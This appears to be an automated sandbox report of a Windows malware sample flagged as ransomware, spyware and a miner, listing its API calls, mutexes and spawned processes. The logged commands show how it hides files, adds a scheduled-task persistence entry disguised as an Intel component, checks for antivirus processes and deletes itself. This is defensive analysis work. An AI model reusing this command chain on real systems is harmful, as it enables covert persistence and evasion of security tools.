                          Source: classification engineClassification label: mal100.rans.troj.spyw.evad.mine.winEXE@108/68@52/12
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_000941FA GetLastError,FormatMessageW,44_2_000941FA
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_0066AC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_0066AC74
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_00671D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,10_2_00671D04
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00082010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,44_2_00082010
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00081A0B AdjustTokenPrivileges,CloseHandle,44_2_00081A0B
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_0066ABB0 GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,10_2_0066ABB0
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0008DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,44_2_0008DD87
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeCode function: 28_2_004024FB CoCreateInstance,28_2_004024FB
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00093A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,44_2_00093A0E
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comMutant created: \Sessions\1\BaseNamedObjects\Global\SyncRootManager
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5536:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1264:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeMutant created: \Sessions\1\BaseNamedObjects\Local\RstrMgr3887CAB8-533F-4C85-B0DC-3E5639F8D511
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5300:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeMutant created: \Sessions\1\BaseNamedObjects\FloppyShip
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4284:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeMutant created: \Sessions\1\BaseNamedObjects\Local\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0000
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                          Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                          Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                          Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: 4fa7efe79d.exe, 00000031.00000003.3167070798.000000000384E000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3167070798.00000000037B7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3140111081.00000000037D5000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3140350189.00000000037B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: file.exeReversingLabs: Detection: 52%
                          Source: file.exeVirustotal: Detection: 58%
                          Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exe "C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                          Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe "C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 245347
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "profiles" Organizing
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Judy + ..\Sheets + ..\Another + ..\Wanting b
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\245347\Dry.com Dry.com b
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exe "C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe "C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeProcess created: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe "C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe "C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exe "C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exe "C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe "C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exe "C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe "C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe "C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exe "C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 245347
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "profiles" Organizing
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Judy + ..\Sheets + ..\Another + ..\Wanting b
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\245347\Dry.com Dry.com b
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeProcess created: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe "C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeProcess created: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exe "C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
